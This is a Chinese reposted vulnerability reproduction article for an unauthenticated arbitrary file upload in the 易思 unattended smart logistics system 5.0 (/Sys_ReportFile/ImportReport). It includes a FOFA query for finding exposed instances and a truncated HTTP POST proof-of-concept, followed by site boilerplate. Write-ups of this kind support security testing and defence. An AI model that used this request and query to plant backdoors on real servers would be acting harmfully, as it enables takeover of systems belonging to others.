易思智能物流无人值守系统文件上传漏洞复现

这篇具有很好参考价值的文章主要介绍了易思智能物流无人值守系统文件上传漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

0x01 产品简介

 易思无人值守智能物流系统是一款集成了人工智能、机器人技术和物联网技术的创新产品。它能够自主完成货物存储、检索、分拣、装载以及配送等物流作业,帮助企业实现无人值守的智能物流运营,提高效率、降低成本,为现代物流行业带来新的发展机遇。

0x02 漏洞概述

 易思无人值守智能物流系统/Sys_ReportFile/ImportReport接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。

0x03 影响范围

  易思智能物流无人值守系统5.0

0x04 复现环境

FOFA:"智能物流无人值守系统"

易思智能物流无人值守系统文件上传漏洞复现,漏洞复现,安全,web安全,网络

0x05 漏洞复现 

PoC文章来源地址https://www.toymoban.com/news/detail-663572.html

POST /Sys_ReportFile/ImportReport?encode=a HTTP/1.1
Host: your-ip
X-File-Name: test.grf
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary= ----WebKitFormBoundaryxzUhGld6cusN3Alk
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=

到了这里,关于易思智能物流无人值守系统文件上传漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • linux PXE和无人值守

    目录 一、pxe概念 二、pxe相关服务 三、pxe装机流程 四、pxe四大文件 五、无人值守 六、实验 自动装机                         一、pxe概念 概念:PXE(预启动执行环境)是由Intel公司开发的网络引导技术,工作在Client/Server模式,允许客户机通过网络从远程服务器下载引导镜

    2024年02月06日
    浏览(31)
  • PXE和kickstart无人值守安装

    1.系统装机的引导方式 启动 操作 系统 1.硬盘 2.光驱(u盘) 3.网络启动 pxe 重装系统? 在已有操作系统 新到货了一台服务器, 装操作系统 系统镜像 u盘 光盘 pe: 小型的 操作系统 在操作系统 再装操作系统 pxe 2.系统安装过程 加载boot loader Boot Loader 是在操作系统内核运行之前

    2024年01月22日
    浏览(43)
  • 亿赛通电子文档安全管理系统任意文件上传漏洞复现

        亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智

    2024年02月12日
    浏览(43)
  • Goby 漏洞发布|亿赛通电子文档安全管理系统 hiddenWatermark/uploadFile 文件上传漏洞

    亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加

    2024年02月21日
    浏览(46)
  • 自定义封装无人值守Windows10镜像

    下载原版镜像 下载途径1:MSDN, 我告诉你 - 做一个安静的工具站 (itellyou.cn) MSDN, 我告诉你 - 做一个安静的工具站 下载途径2: 下载 Windows 10 (microsoft.com) 下载 Windows 10 下载工具,运行工具: 使用原版镜像安装一台电脑,并安装需要部署的软件。比如office、解压软件、通讯软件等

    2024年02月07日
    浏览(32)
  • SPON世邦 IP网络对讲广播系统 多处文件上传漏洞复现

    SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。 SPON世邦IP网络对讲广播系统 addscenedata.php、uploadjson.php、my_parser.php等接口处存在任意文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传恶意后门文件,可导致服务器失陷。

    2024年02月03日
    浏览(40)
  • 亿赛通电子文档安全管理系统任意文件上传漏洞(2023-HW)

    免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 ​ 亿赛通电子文档安全管理系统(简称:

    2024年02月12日
    浏览(50)
  • 亿某通电子文档安全管理系统 hidden-uploadFile 文件上传漏洞-1day未公开漏洞

            技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使

    2024年02月20日
    浏览(50)
  • TeamViewer Host无人值守远程控制手机,无需root。

    本人用的是华为mate8,操作系统是安卓8,无需root。 网上搜过一些内容,参考了一些文章,那些文章的链接在哪我也记不清了 就写写我的操作步骤 1、手机端安装teamviewer host及teamviewer universal add-on。 华为官方应用市场里面就能搜到,必须都要安装   2、 安装之后,第一次打开

    2024年02月08日
    浏览(185)
  • 工业4G路由器的户外组网与无人值守场景应用

    工业4G路由器是专为不便电缆布线的工业或日晒雨淋网络不畅的户外环境所设计的网络设备。它能够在没有光纤宽带的情况下使用插卡的方式提供4G或无线WiFi的网络支持。具备工业级防水功能,能够在户外环境下进行网络部署,并实现无人值守运行。工业4G路由器还常用于传感

    2024年02月09日
    浏览(50)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包